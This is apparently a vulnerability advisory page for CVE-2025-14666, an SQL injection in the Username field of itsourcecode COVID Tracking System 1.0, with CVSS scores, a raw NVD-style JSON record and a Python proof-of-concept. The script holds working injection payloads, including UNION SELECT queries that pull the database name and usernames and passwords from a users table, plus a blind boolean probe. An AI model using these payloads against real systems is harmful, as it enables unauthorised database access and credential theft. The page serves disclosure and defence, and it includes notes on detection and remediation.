Security Vulnerability Report
CVE-2025-14666 CVSS 7.3 HIGH

CVE-2025-14666

Published: 2025-12-14 16:15:37
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in itsourcecode COVID Tracking System 1.0. The affected element is an unknown function of the file /admin/?page=user. Manipulating the argument Username leads to SQL injection. The attack can be carried out remotely. An exploit has been made publicly available and could be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
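CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: this is the CVSS 3.1 entry marked "Secondary" in the raw record below. The same record also carries a "Primary" CVSS 3.1 entry of 9.8 CRITICAL (C:H/I:H/A:H) and a CVSS 4.0 entry of 5.5 MEDIUM, so the severity to act on depends on which source you follow.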

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:covid_tracking_system:1.0:*:*:*:*:*:*:* - VULNERABLE
itsourcecode COVID Tracking System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14666 SQL Injection PoC
# Target: itsourcecode COVID Tracking System 1.0
# Endpoint: /admin/?page=user
# Parameter: Username
#
# Reviewer notes:
# - The listing was published collapsed onto one line; the line structure
#   below is a reconstruction. In union_injection() and blind_injection() the
#   final `return` is placed after the `if`, which is the reading assumed here.
# - The advisory text names only the endpoint and the Username argument. The
#   use of POST, the five-column UNION shape, and a `users` table with
#   `username`/`password` columns are assumptions of this script, not facts
#   from the advisory -- TODO confirm against the referenced issue.
# - The response checks are substring matches ("sql", "error", "success"), so
#   a hit is an indication only and is prone to false positives.
# - Only test_basic_injection() runs from the entry point; the other three
#   functions are defined but never invoked.
# - For defenders: the record classifies this as CWE-89. The application-side
#   fix is to bind the Username value as a parameter of a prepared statement
#   instead of concatenating it into the query. These probes would appear as a
#   quote character or UNION SELECT text in the Username field of requests to
#   /admin/?page=user, where request bodies are logged.
import requests
import sys

target_url = "http://target-site.com/admin/?page=user"


def _post_username(payload):
    """POST *payload* as the ``Username`` form field to the current ``target_url``.

    ``target_url`` is read at call time, so the override done in the entry
    point is honoured.
    """
    return requests.post(target_url, data={"Username": payload})


def test_basic_injection():
    """Send a lone single quote and report whether the reply looks like an error.

    Returns:
        True if the lower-cased response body contains "sql" or "error",
        otherwise False. Any page that happens to contain either word also
        matches, so True is not proof of injection.
    """
    print("[*] Testing basic SQL injection...")
    body = _post_username("'").text.lower()
    if "sql" not in body and "error" not in body:
        return False
    print("[+] SQL injection confirmed - error detected")
    return True


def union_injection():
    """Send a five-column UNION SELECT that asks for ``database()``.

    Returns:
        The raw response text. The "[+]" line is printed on any HTTP 200,
        which by itself does not show that a value was returned.
    """
    print("[*] Performing UNION-based injection...")
    # database() is MySQL/MariaDB syntax; the column count is a guess (see header).
    resp = _post_username("' UNION SELECT NULL,database(),NULL,NULL,NULL-- -")
    if resp.status_code == 200:
        print("[+] Database name extracted")
    return resp.text


def extract_users():
    """Send a UNION SELECT against an assumed ``users`` table.

    Returns:
        The raw response text; nothing is parsed or validated here.
    """
    print("[*] Extracting user credentials...")
    resp = _post_username(
        "' UNION SELECT NULL,username,password,NULL,NULL FROM users-- -"
    )
    return resp.text


def blind_injection():
    """Send a boolean condition on an assumed ``users`` table.

    Returns:
        The raw response text. The "[+]" line is printed when the lower-cased
        body contains "success", which the page may contain for other reasons.
    """
    print("[*] Performing blind SQL injection...")
    resp = _post_username(
        "' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0-- -"
    )
    if "success" in resp.text.lower():
        print("[+] Admin user exists in database")
    return resp.text


if __name__ == "__main__":
    # An optional first CLI argument replaces the placeholder URL.
    cli_args = sys.argv[1:]
    if cli_args:
        target_url = cli_args[0]
    print(f"[*] Target: {target_url}")
    test_basic_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14666", "sourceIdentifier": "[email protected]", "published": "2025-12-14T16:15:37.047", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in itsourcecode COVID Tracking System 1.0. The affected element is an unknown function of the file /admin/?page=user. This manipulation of the argument Username causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:covid_tracking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F9CA2A72-A364-4090-A959-6AA82D55A239"}]}]}], "references": [{"url": "https://github.com/bardminx/Lonlydance/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.336398", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336398", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.714786", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}